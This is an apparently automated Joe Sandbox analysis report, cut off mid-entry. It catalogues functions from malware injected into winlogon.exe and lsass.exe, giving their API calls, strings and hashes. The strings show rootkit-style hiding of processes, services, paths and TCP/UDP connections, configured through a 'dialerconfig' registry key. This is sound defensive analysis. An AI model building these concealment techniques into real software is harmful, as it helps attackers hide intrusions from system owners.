Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 29ba444ec149a436658b3a33bb87387c8e304e9762ecaf4f7308c61e6fc9f45a
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 0C51A1323156828BEB64DF3DE444BA977A5F348BAAF508134DED64778ADB35E841C700

Function 000001F6C88A90D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 000001F6C88A91E7

Strings

csm, xrefs: 000001F6C88A917E
f, xrefs: 000001F6C88A9116

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: 7084505634da937256a8f27ac6debe493be642d8306f801c732bcc996970535c
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 7D518C3261A6028AEB24CB35EC44BE97795F384BA8F518134DAE647FC8DB79E841C700

Function 000001F6C89024DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F6C89025C3
StrCpyW.SHLWAPI ref: 000001F6C89025DA

Strings

\\.\pipe\, xrefs: 000001F6C89025CE

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: e80656745ce4937c6d43981e506399177344f0fcb98a132e0fc4c10f6c84c0bc
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: FD51C5326087C282E636DABD95543FEA795F3897A2F55403AEDCA03B9BCF35C4018B41

Function 000001F6C88A24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F6C88A25C3
StrCpyW.SHLWAPI ref: 000001F6C88A25DA

Strings

\\.\pipe\, xrefs: 000001F6C88A25CE

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 8343a926a68e06b2c81df7b96dc02fe71984818be82e8225ca1f847bc436c022
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B651F43220B78382E674DE79A5543FAA699F3857A0F444039CECA03FD9DF39E8018B40

Function 000001F6C8910604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F6C891071B
GetLastError.KERNEL32 ref: 000001F6C891073D

Strings

U, xrefs: 000001F6C89106C7

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: e014aab257806e911d2217eadc77dde70f83a564810960c46194a027ce3203ef
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: A541B232319A8185EB20DF29E8443EA67A4F398BE5F404135EECE87B99DB3DC501CB40

Function 000001F6C88B0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F6C88B071B
GetLastError.KERNEL32 ref: 000001F6C88B073D

Strings

U, xrefs: 000001F6C88B06C7

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: fbc1901cd438fe050015c8f5b048eff89929c16979c3787b0623c9504132a890
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: DB419F72216A8191EB20DF65E8443FAA7A0F7D87A4F404035EECE87B98EB38C541CB44

Function 000001F6C89094A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F6C89094E8
RaiseException.KERNEL32 ref: 000001F6C890952E

Strings

csm, xrefs: 000001F6C890951B

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 910eeaf10941734512f60460452778d40db5f270d29c1e26b833756a592517e9
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: F1111F32218B8182EB61CF29E4402A977A5F788BA9F584225DFCD0BB65DF3CD555CB00

Function 000001F6C88A94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F6C88A94E8
RaiseException.KERNEL32 ref: 000001F6C88A952E

Strings

csm, xrefs: 000001F6C88A951B

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: f7c407b3cb736b869750c279c4897b5659604303bb134e3bc3c21475f32ee55e
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 27110D3221AB8182EB618B25F8402A977E5F788BA8F184225DFDD07BA4DF3DD555CB00

Function 000001F6C8901D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C8901D9B
HeapAlloc.KERNEL32 ref: 000001F6C8901DAA
GetProcessHeap.KERNEL32 ref: 000001F6C8901E1E
HeapFree.KERNEL32 ref: 000001F6C8901E2C

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: ff42e035ef30430dea2488309c725905cb3e6237a7a3f2154f28ae32bb7f7daf
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 87218132704BC182EB21CF6DA4042AAF7B4FB88BA5F554125EECD47B26EF78C5428700

Function 000001F6C88A1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C88A1D9B
HeapAlloc.KERNEL32 ref: 000001F6C88A1DAA
GetProcessHeap.KERNEL32 ref: 000001F6C88A1E1E
HeapFree.KERNEL32 ref: 000001F6C88A1E2C

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: b2c8858c67d86593c067c296386619029cbc14546a3cfedbce96b29b6c8f8608
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 5B218336606B9185EB61CF69A4002FAF3A4FBC4BA4F054125EFCD87F95EE78C5528700

Function 000001F6C8901274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C890127A
HeapAlloc.KERNEL32 ref: 000001F6C8901289
GetProcessHeap.KERNEL32 ref: 000001F6C89012A3
HeapAlloc.KERNEL32 ref: 000001F6C89012B4

Memory Dump Source

Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 15f102888c6a7d45419297a01f1ae9a5b5e1e3b04012511d416dfce55540dea1
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 85E0C9B171160186E714DB7AD8143A9BAE5EB88B62F89C024C98907351DF7DC499D750

Function 000001F6C88A1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F6C88A127A
HeapAlloc.KERNEL32 ref: 000001F6C88A1289
GetProcessHeap.KERNEL32 ref: 000001F6C88A12A3
HeapAlloc.KERNEL32 ref: 000001F6C88A12B4

Memory Dump Source

Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: c21ecb1373d019ddf805e93b9c9dc80aa6e4b5facb562c68f45f8517f260b21c
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 4BE06DB1612601C6E714CF72DC043A93AE5FBC8F21F48C024CA8947750DF7D8599C740

Analysis Process: lsass.exePID: 908, Parent PID: 8464COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	300
Total number of Limit Nodes:	15

Executed Functions

Function 00000261AC9026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000261AC9027D4
StrCpyW.SHLWAPI ref: 00000261AC9027ED

Strings

\\.\pipe\, xrefs: 00000261AC9027DF

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: ff6bc897040fc2b7b90d748e7b64751de366c7f705f3dda71cc99942044e07ac
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: DD71D536202F81C6E7649FA99B4C3AA6795F784BACF4C4016DE5943F89DE36DE24C700

Function 00000261AC9021CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000261AC902270

Part of subcall function 00000261AC9030B4: GetProcessHeap.KERNEL32 ref: 00000261AC9030D7
Part of subcall function 00000261AC9030B4: HeapAlloc.KERNEL32 ref: 00000261AC9030EA
Part of subcall function 00000261AC9030B4: StrCmpNIW.SHLWAPI ref: 00000261AC90316B
Part of subcall function 00000261AC9030B4: GetProcessHeap.KERNEL32 ref: 00000261AC9031D1
Part of subcall function 00000261AC9030B4: HeapFree.KERNEL32 ref: 00000261AC9031DF

Strings

S, xrefs: 00000261AC902391
dialer, xrefs: 00000261AC902269

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: a0d72138f5b87211087cdad282d03a7789c7940c3e3da31ecf8d1c04d7fb8e1d
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: E0519532B12F64C6F768CBE696486AD63A4F704BA8F189425DE5523B44DB36EC61C310

Function 00000261AC901650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000261AC90165B
HeapAlloc.KERNEL32 ref: 00000261AC90166A

Part of subcall function 00000261AC901274: GetProcessHeap.KERNEL32 ref: 00000261AC90127A
Part of subcall function 00000261AC901274: HeapAlloc.KERNEL32 ref: 00000261AC901289
Part of subcall function 00000261AC901274: GetProcessHeap.KERNEL32 ref: 00000261AC9012A3
Part of subcall function 00000261AC901274: HeapAlloc.KERNEL32 ref: 00000261AC9012B4

RegOpenKeyExW.ADVAPI32 ref: 00000261AC9016DA
RegOpenKeyExW.ADVAPI32 ref: 00000261AC901707
RegCloseKey.ADVAPI32 ref: 00000261AC901721
RegOpenKeyExW.ADVAPI32 ref: 00000261AC901741
RegCloseKey.ADVAPI32 ref: 00000261AC90175C
RegOpenKeyExW.ADVAPI32 ref: 00000261AC90177C
RegCloseKey.ADVAPI32 ref: 00000261AC901797
RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017B7
RegCloseKey.ADVAPI32 ref: 00000261AC9017D2
RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017F2
RegCloseKey.ADVAPI32 ref: 00000261AC90180D
RegOpenKeyExW.ADVAPI32 ref: 00000261AC90182D
RegCloseKey.ADVAPI32 ref: 00000261AC901848
RegOpenKeyExW.ADVAPI32 ref: 00000261AC901868
RegCloseKey.ADVAPI32 ref: 00000261AC901883
RegOpenKeyExW.ADVAPI32 ref: 00000261AC9018A3
RegCloseKey.ADVAPI32 ref: 00000261AC9018BE
RegCloseKey.ADVAPI32 ref: 00000261AC9018C8

Part of subcall function 00000261AC9012C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000261AC901326
Part of subcall function 00000261AC9012C8: GetProcessHeap.KERNEL32 ref: 00000261AC901334
Part of subcall function 00000261AC9012C8: HeapAlloc.KERNEL32 ref: 00000261AC901345
Part of subcall function 00000261AC9012C8: RegEnumValueW.ADVAPI32 ref: 00000261AC9013A1
Part of subcall function 00000261AC9012C8: GetProcessHeap.KERNEL32 ref: 00000261AC9013E9
Part of subcall function 00000261AC9012C8: HeapAlloc.KERNEL32 ref: 00000261AC9013F7
Part of subcall function 00000261AC9012C8: GetProcessHeap.KERNEL32 ref: 00000261AC90141B
Part of subcall function 00000261AC9012C8: HeapFree.KERNEL32 ref: 00000261AC901429
Part of subcall function 00000261AC9012C8: lstrlenW.KERNEL32 ref: 00000261AC901432
Part of subcall function 00000261AC9012C8: GetProcessHeap.KERNEL32 ref: 00000261AC901440
Part of subcall function 00000261AC9012C8: HeapAlloc.KERNEL32 ref: 00000261AC90144E

Strings

service_names, xrefs: 00000261AC9017EB
pid, xrefs: 00000261AC90173A
process_names, xrefs: 00000261AC901775
paths, xrefs: 00000261AC9017B0
tcp_local, xrefs: 00000261AC901826
udp, xrefs: 00000261AC90189C
tcp_remote, xrefs: 00000261AC901861
SOFTWARE\dialerconfig, xrefs: 00000261AC9016BA
startup, xrefs: 00000261AC9016FD

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4e3c61d095f320f0bb24a8820c1c27ceedff52166cbb4e87cdbb9a0357a456d2
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 3E715A36312F40DAEB50DFA9E98969927B8FB84B9CF081115DE4D53B28DF3AD965C300

Function 00000261AC901AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000261AC901AD8
StrCmpNIW.SHLWAPI ref: 00000261AC901AF2
lstrlenW.KERNEL32 ref: 00000261AC901B01
StrCpyW.SHLWAPI ref: 00000261AC901B16

Strings

\\?\, xrefs: 00000261AC901AE6

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: f6aa621237e332ac6ce8727f2d1ad507e5a201ec82ed6ad1687992cf6579201d
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 0DF0AF32301781D2EB608BA8F6993596774F784B9CF888024CA4846968DF2EDE98CB00

Function 00000261AC903458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000261AC90347A
PathFindFileNameW.SHLWAPI ref: 00000261AC903489

Part of subcall function 00000261AC903930: StrCmpNIW.SHLWAPI ref: 00000261AC903948

Part of subcall function 00000261AC903878: GetModuleHandleW.KERNEL32 ref: 00000261AC903886
Part of subcall function 00000261AC903878: GetCurrentProcess.KERNEL32 ref: 00000261AC9038B4
Part of subcall function 00000261AC903878: VirtualProtectEx.KERNEL32 ref: 00000261AC9038D6
Part of subcall function 00000261AC903878: GetCurrentProcess.KERNEL32 ref: 00000261AC9038F4
Part of subcall function 00000261AC903878: VirtualProtectEx.KERNEL32 ref: 00000261AC903915

CreateThread.KERNEL32 ref: 00000261AC9034D7

Part of subcall function 00000261AC901EB4: GetCurrentThread.KERNEL32 ref: 00000261AC901EBF

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 76cf64d1bac4018ff413cd988f6b5c93663058f0a86c63448ce7790e587a8ac3
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 15115B70612701C6F7A197E9AB4F35932A8B79476CF4C00299A1689194EF3BEEA4C200

Function 00000261AC901C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000261AC901650: GetProcessHeap.KERNEL32 ref: 00000261AC90165B
Part of subcall function 00000261AC901650: HeapAlloc.KERNEL32 ref: 00000261AC90166A
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9016DA
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901707
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901721
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901741
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC90175C
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC90177C
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901797
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017B7
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9017D2
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017F2

Sleep.KERNEL32 ref: 00000261AC901C43
SleepEx.KERNELBASE ref: 00000261AC901C49

Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC90180D
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC90182D
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901848
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901868
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901883
Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9018A3
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9018BE
Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9018C8

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 82e00eca69bcfc2eff97743fba3731d8fe79f1ab825d46741ac9dd8b0ae167cb
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: AF31DD35202A01D1FF559FB6EB4935E22A5AB44BE8F0C5021EE09876E6EF26EC70C250

Function 00000261AC903930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000261AC903948

Strings

dialer, xrefs: 00000261AC903941

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 3cc756c5df4cd04c0ef55a05882639c61e2ad0c74402b1df68200daab3f1bb1b
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 33D0A73031374BC6FF54DFEA8ACA2602368FB4571CF4C8024CA1142514DB1AAEADC710

Function 00000261AC8D2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000261AC8D2A31

Memory Dump Source

Source File: 0000001B.00000002.12819648693.00000261AC8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac8d0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: a0f64ac41a019554900ef271842948e46edc4507b0a67bd71b44a59f7525efdf
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 39611F32702752C7EAAACFA9D44876CB391FB04BA4F588121DA1907785DB3AFC67D700

Function 00000261AC90B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 00000261AC90B8B5

Memory Dump Source

Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: 9be9cd167b6386ddeb86ba5c5470eb8bd2a74a01cb3c9160dc0c2a264724eb68
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 34F0B4B4303305C0FE95ABE2970D39512807F88B6CF0C44748E0A863E5EE2EECA4C210

Non-executed Functions

Function 00000261AC902CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000261AC902D80
lstrlenW.KERNEL32 ref: 00000261AC902FBA

Part of subcall function 00000261AC901A14: OpenProcess.KERNEL32 ref: 00000261AC901A3A
Part of subcall function 00000261AC901A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000261AC901A58
Part of subcall function 00000261AC901A14: PathFindFileNameW.SHLWAPI ref: 00000261AC901A67
Part of subcall function 00000261AC901A14: lstrlenW.KERNEL32 ref: 00000261AC901A73
Part of subcall function 00000261AC901A14: StrCpyW.SHLWAPI ref: 00000261AC901A86
Part of subcall function 00000261AC901A14: CloseHandle.KERNEL32 ref: 00000261AC901A94

GetProcAddress.KERNEL32 ref: 00000261AC902D95

Part of subcall function 00000261AC901554: StrCmpIW.SHLWAPI ref: 00000261AC901585

Part of subcall function 00000261AC903930: StrCmpNIW.SHLWAPI ref: 00000261AC903948

StrCmpNIW.SHLWAPI ref: 00000261AC902DD8
lstrlenW.KERNEL32 ref: 00000261AC902F00

Strings

NtQueryObject, xrefs: 00000261AC902D8B
ntdll.dll, xrefs: 00000261AC902D79
\Device\Nsi, xrefs: 00000261AC902DCB

Memory Dump Source

